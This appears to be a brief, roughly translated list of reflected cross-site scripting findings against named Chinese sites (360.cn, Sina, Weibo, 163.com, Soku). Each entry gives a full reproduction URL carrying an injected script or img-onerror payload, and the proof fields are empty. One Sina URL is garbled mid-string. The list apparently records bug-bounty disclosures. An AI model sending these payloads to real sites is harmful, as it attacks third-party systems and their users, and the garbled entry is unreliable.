360 XSS
Vulnerability Website: http://dev.app.360.cn
Vulnerability reproduction: http://dev.app.360.cn/seriesnum/api?Appkey=02a051317dd72145920.ecc8e6e77abf&status=1&product_id=Grsm_02&is_real=0&callback=%3Cscript%3Ealert%281%29%3C/script%3E
Proof of vulnerability:
Vulnerability Website: http://wangzhan.360.cn
Vulnerability reproduction: http://wangzhan.360.cn/index.php/abc/abc/abc/%22%3E%3Cscript%3Ealert%28%2fqingsh4n%2f%29%3C%2fscript%3E%2f%2f
Proof of vulnerability:
PS: the above two have been completed, and two USB flash drives have been rubbed.
Sina XSS
Vulnerability Website: http://common.fj.sina.com.cn/
Vulnerability reproduction:
http://common.fj.sina.com.cn/index.php/201209room/interfaces/vote_entry?Callback=%2B%2Fv8%20% bytes
Proof of vulnerability:
Vulnerability Website: http://qing.weibo.com/
Vulnerability reproduction: http://qing.weibo.com/2389286414/8e699e0e34002bsw.html
Proof of vulnerability:
163 XSS
Vulnerability Website: http://blog.163.com
Vulnerability reproduction:
http://blog.163.com/s/musicWrap.s?N=%B1q%C0Y%A6A%A8%D3&a=%BCB%C5w&t=lrc&event=qingshen&_jsonType=2
Proof of vulnerability:
Soku XSS
Vulnerability Website: http://www.soku.com/
Vulnerability reproduction:
http://www.soku.com/t/nisearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E///
Proof of vulnerability: